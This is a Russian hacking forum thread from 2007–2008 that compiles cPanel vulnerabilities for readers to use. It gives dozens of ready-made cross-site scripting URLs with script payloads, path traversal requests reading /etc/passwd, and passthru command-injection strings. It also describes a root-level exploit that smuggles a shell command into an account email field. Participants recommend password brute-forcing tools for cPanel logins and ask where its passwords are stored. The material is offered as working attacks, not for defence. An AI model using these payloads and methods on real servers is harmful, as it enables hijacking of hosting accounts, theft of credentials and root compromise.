[ Обзор: уязвимости cPanel ]

Discussion in 'Веб-уязвимости' started by Solide Snake, 30 Nov 2007.

  1. Solide Snake

    Solide Snake Banned

    Joined:
    28 Apr 2007
    Messages:
    382
    Likes Received:
    820
    Reputations:
    69
    Мой сегодняшний мини обзор уязвимостей посвящён cPanel.
    Надеюсь вам будет интерестно и полезно:)

    Exploits:

    cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
    cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
    cPanel <= 10.9.x (fantastico) Local File Inclusion Vulnerabilities
    exploit for Cpanel 5 remote command execution
    local cPanel <= 10.8.x cpwrap root exploit via mysqladmin
    BasiliX <= 1.1.1 Remote File Include Exploit
    exploit for Cpanel 5 remote command execution
    Multiple xxs cPanel 10


    CPanel 11 Multiple Cross-Site Scription

    Code:
    http://target:2082/frontend/x/files/fileop.html?opdir=[PATH]&opfile=[FILENAME]&fileop=XSS 
    http://target:2082/frontend/x/files/editit.html?dir=/home/xdemo&file=XSS 
    http://target:2082/frontend/x/files/createdir.html?dir=XSS 
    http://target:2082/frontend/x/htaccess/dohtaccess.html?dir=xss 
    http://target:2082/frontend/x/err/erredit.html?dir=XSS 
    http://target:2082/frontend/x/err/erredit.html?dir=[DIRNAME]&file=XSS 
    http://target:2082/frontend/x/files/createfile.html?dir=XSS

    Exensive cPanel Cross Site Scripting

    Code:
    [B]Systems Affected:[/B] cPanel 9.1.0-R85
    
    To check cPanel for CSS, simply access the following example URLs in a browser: 
    http://[victim]/frontend/x/cpanelpro/ignorelist.
    html?account="><script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x/cpanelpro/showlog.
    html?account=<script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x/sql/repairdb.
    html?db=<script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x/ftp/doaddftp.
    html?login="><script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x/cpanelpro/editmsg.
    html?account="><script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x/testfile.
    html?email=<script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x2/err/erredit.
    html?dir=public_html/&file=<script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x2/net/dnslook.html?dns=</pre><script>window.location='s="fixed">http://www.cirt.net/'</script> 
    http://[victim]/frontend/x2/denyip/del.
    html?ip=<script>alert('Vulnerable')</script> 
    http://[victim]/frontend/x2/htaccess/index.
    html?dir=<script>alert('Vulnerable')</script>
    References:
    Updated information can be found on OSVDB.org under the following entries:
    http://www.osvdb.org/4208 cPanel testfile.html email Variable XSS
    http://www.osvdb.org/4209 cPanel erredit.html file Variable XSS
    http://www.osvdb.org/4210 cPanel dnslook.html dns Variable XSS
    http://www.osvdb.org/4211 cPanel ignorelist.html account Variable XSS
    http://www.osvdb.org/4212 cPanel showlog.html account Variable XSS
    http://www.osvdb.org/4213 cPanel repairdb.html db Variable XSS
    http://www.osvdb.org/4214 cPanel doaddftp.html login Variable XSS
    http://www.osvdb.org/4215 cPanel editmsg.html account Variable XSS
    http://www.osvdb.org/4243 cPanel del.html account Variable XSS


    cPanel 10.9.1 XSS

    Code:
    cPanel 10.9.1 XSS 
    
    /frontend/x/htaccess/changepro.html?protected=1&resname=XSS_GOES_HERE 
    (click on Go Back...)

    XSS in Cpanel 10

    Code:
    [COLOR=DarkOrange][B]Exploit & Examples:[/B][/COLOR] 
    
    [B]Exploit:[/B] 
    http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file= <h1><b>Your code here!!</b></h1> 
    
    [B]Javascript:[/B] 
    http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG src="javascript:alert('yeah');"> 
    
    [B]Server Side Inclusion[/B] 
    http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo var="HTTP_REFERER" --> 
    
    [B]HTML [/B]
    http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME SRC="index.html">

    cPanel Version 11 Pops.Html Cross-Site Scripting

    Code:
    http://target:2082/mail/pops.html?domain=XSS

    cPanel Multiple Cross Site Scripting Vulnerability

    Code:
    [B]Affected scripts with proof of concept exploit:[/B] 
    
    http://www.vulnerable-site.com:2082/frontend/xcontroller/editquota.
    html?email= <script>alert('vul')</script>&domain= 
    
    http://www.vulnerable-site.com:2082/frontend/xcontroller/dodelpop.
    html?email= <script>alert('vul')</script>&domain=xxx 
     
    http://www.vulnerable-site.com:2082/frontend/xcontroller/diskusage.
    html?showtree=0 "><script>alert('vul')</script> 
     
    http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
    html?mon=Jan&year=2006&domain=xxx&target= "><script>alert('vul')</script> 
     
    http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
    html?mon=Jan&year=2006&domain=xxx "><script>alert('vul')</script>&target=xxx 
    
    http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
    html?mon=Jan&year=2006 "><script>alert('vul')</script>&domain=xx
    x&target=xxx 
     
    http://www.vulnerable-site.com:2082/frontend/xcontroller/stats/detailbw.
    html?mon=Jan "><script>alert('vul')</script>&year=2006
    &domain=xxx&target=xxx

    CPanel 10 Multiple Cross Site Scription

    Code:
    [COLOR=DarkOrange][B]CPanel file Manager:[/B][/COLOR] 
    PoC: 
    http://target.com:2082/frontend/[Servername]/files/seldir.html?dir=[XSS] 
    
    [COLOR=DarkOrange][B]CPanel Password Protect DIRS:[/B][/COLOR] 
    PoC: 
    http://target.com:2082/frontend/[servername]/htaccess/newuser.
    html?user=[XSS]&pass=&dir=A VALID FOLDER 
    *Press Go Back (hyperlink) 
    
    [COLOR=DarkOrange][B]In Password Protected DIR:[/B][/COLOR] 
    PoC: 
    http://www.target:2082/frontend/[servername]/htaccess/newuser.
    html?user=[XSS]&pass=&dir=[XSS]

    Major Cpanel Expliot HTML Injection

    Code:
    http://(domain):
    2086/scripts/passwd?password=<>&domain=<>&user=<>
     
    #1 Solide Snake, 30 Nov 2007
    Last edited: 1 Dec 2007
    15 people like this.
  2. F!$T

    F!$T Повелитель шнэков!

    Joined:
    5 Feb 2007
    Messages:
    94
    Likes Received:
    300
    Reputations:
    6
    очередной интересный обзор... что сказать +1
     
    3 people like this.
  3. lsass.exe

    lsass.exe Elder - Старейшина

    Joined:
    5 Aug 2007
    Messages:
    156
    Likes Received:
    161
    Reputations:
    24
    интересно, щас затестим =\ спс ;)
     
  4. DEMIX

    DEMIX Elder - Старейшина

    Joined:
    17 Jun 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    Не пойму что нам даст XSS уязвимость??? Разве что только куки.

    У меня такой вопрос: я подбирал вручную логин и пароль в cPanel 11 и меня все время скидывало назад не выдавая никакой ошибки, но потом я попал на логин «бла…бла…бла» и мне выдало: «Login Attempt Failed!» – что в переводе означает «Неудавшаяся Попытка Логина!»
    Когда я ввожу этот логин «бла…бла…бла» и любой пароль то мне все время выдает ету надпись. Значит ли это что я подобрал логин для cPanel???

    И еще вопрос какую прогу посоветуете для подбора пароля к cPanel 11???
     
  5. bul.666

    bul.666 булка

    Joined:
    6 Jun 2006
    Messages:
    719
    Likes Received:
    425
    Reputations:
    140
    А тебе этого мало?
    BrutusAET2, THC Hydra
     
  6. DEMIX

    DEMIX Elder - Старейшина

    Joined:
    17 Jun 2007
    Messages:
    42
    Likes Received:
    5
    Reputations:
    0
    Хотелось большего.

    Еще один вопрос: в каких файлах хранятся пароли от cPanel?
     
  7. Ali_MiX

    Ali_MiX Elder - Старейшина

    Joined:
    8 Oct 2006
    Messages:
    377
    Likes Received:
    67
    Reputations:
    -2
    Сенкс. Кто покажет уже на примере.
     
  8. guest3297

    guest3297 Banned

    Joined:
    27 Jun 2006
    Messages:
    1,246
    Likes Received:
    639
    Reputations:
    817
    Скажу тупо взято с баг траков и не поверенно, все уязвисости не предоставляют особой опасноти.

    От меня :

    Инклуды.
    Code:
    ./tbl_replace.php?db=test&table=test&goto=/etc/hosts
    ./sql.php?goto=/etc/hosts&btnDrop=No
    ./export.php?what=../../../../../../etc/passwd%00
    Поизвольное иполнение команд:
    Code:
    ./tbl_copy.php?strCopyTableOK=.passthru('/bin/ls').
    ./tbl_copy.php?db=test&table=test&new_name=test.test2&strCopyTableOK="".passthru('/bin/ls')."""
    Раскрытие пути.
    Code:
    ./libraries/grab_globals.lib.php
     
    2 people like this.
  9. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    cPanel 11.x directories listing

    Vulnerable: cPanel 11.x (tested on 11.18.3)

    PoC:
    Code:
    http://www.example.com:2082/frontend/x/diskusage/index.html?showtree=/etc
    
     
  10. iddqd

    iddqd Banned

    Joined:
    19 Dec 2007
    Messages:
    637
    Likes Received:
    519
    Reputations:
    19
    XSS in cPanel 11.x

    XSS

    Vulnerable: cPanel 11.x [tested on cPanel V 11.18.3, cPanel V 11.21.0-BETA]

    PoC:
    Code:
    http://example.com:2082/frontend/x/manpage.html?[XSS]
    
    © Linux_Drox
     
  11. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
    cPanel ALL local root blind command execution


    cPanel ALL local root blind command execution

    Вы должны иметь права на создание нового аккаунта(reseller privilege)

    _http://packetstormsecurity.org/0805-exploits/cpanel-root.txt

    Суть уязвимости.

    Скрипт wwwact , который служит для создание новой учети на серваке, уязвим для внедрения шелл-символов в поле емайла.

    В поле мыла вставлется эксплоит вида: [email protected];./home/hackerz/public_html/do.pl
    Далее попытка создать аккаунт вызовет исполнение вашего кода из под рута.
    Поскольку результата выполнения вы не увидете, рекомендуется предусмотреть в запускаемом скрипте вывод результата в файл, доступный вам на чтение.
     
  12. Connor

    Connor Elder - Старейшина

    Joined:
    15 Nov 2006
    Messages:
    295
    Likes Received:
    287
    Reputations:
    38
    Ещё одна XSS в fantastico de luxe
     
    #12 Connor, 22 Nov 2008
    Last edited: 22 Nov 2008
    3 people like this.